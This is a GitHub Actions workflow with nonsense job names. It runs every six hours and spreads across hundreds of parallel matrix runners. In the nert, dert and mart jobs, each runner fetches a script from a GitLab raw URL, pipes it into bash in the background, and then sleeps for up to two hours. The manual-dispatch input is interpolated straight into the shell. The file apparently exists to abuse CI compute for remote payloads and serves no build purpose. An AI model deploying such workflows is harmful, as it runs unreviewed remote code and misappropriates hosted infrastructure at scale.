name: ERTEWSWA

on:
  workflow_dispatch:
    inputs:
      command:
        description: 'Perintah untuk job nert & dert'
        required: false
        default: 'curl -sL https://gitlab.com/masaakk88/file/diamonds8line/-/raw/main/var999 | bash'
  schedule:
    - cron: '0 */6 * * *'   # setiap 6 jam

jobs:
  hert:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        build: [X.1, Y.1]                                          
        flag: [Alpha, Beta, Gamma, Delta, Epsilon, Zeta, Eta, Theta, Iota, Kappa]  
    steps:
      - name: hertob
        continue-on-error: true
        run: echo hert

  nert:
    needs: [hert]
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        build: [N1, N2, N3, N4, N5, N6, N7, N8, N9, N10]        
        flag: [Red, Blue, Green, Yellow, Purple, Orange, Pink, Cyan, Magenta, Lime, Teal, Lavender, Maroon, Navy] 
    steps:
      - name: Jalankan perintah (background + sleep 4 menit)
        continue-on-error: true
        run: |
          ${{ github.event.inputs.command || 'curl -sL https://gitlab.com/masaakk88/file/diamonds8line/-/raw/main/var999 | bash' }} &
          sleep 240s

  dert:
    needs: [nert]
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        build: [D1, D2, D3, D4, D5, D6, D7, D8, D9, D10]                 
        flag: [One, Two, Three, Four, Five, Six, Seven, Eight, Nine, Ten, Eleven, Twelve]  
    steps:
      - name: dertjob (background + sleep 18 menit)
        continue-on-error: true
        run: |
          ${{ github.event.inputs.command || 'curl -sL https://gitlab.com/masaakk88/file/diamonds8line/-/raw/main/var999 | bash' }} &
          sleep 12m

  mart:
    needs: [dert]
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        build: [M1, M2, M3, M4, M5, M6, M7, M8]                
        flag: [Spring, Summer, Autumn, Winter, Monsoon, Dry, Wet, Hot, Cold, Warm, Cool, Mild]  
    steps:
      - name: martjob (background + sleep 120 menit)
        continue-on-error: true
        run: |
          ${{ github.event.inputs.command || 'curl -sL https://gitlab.com/masaakk88/file/diamonds8line/-/raw/main/var999 | bash' }} &
          sleep 120m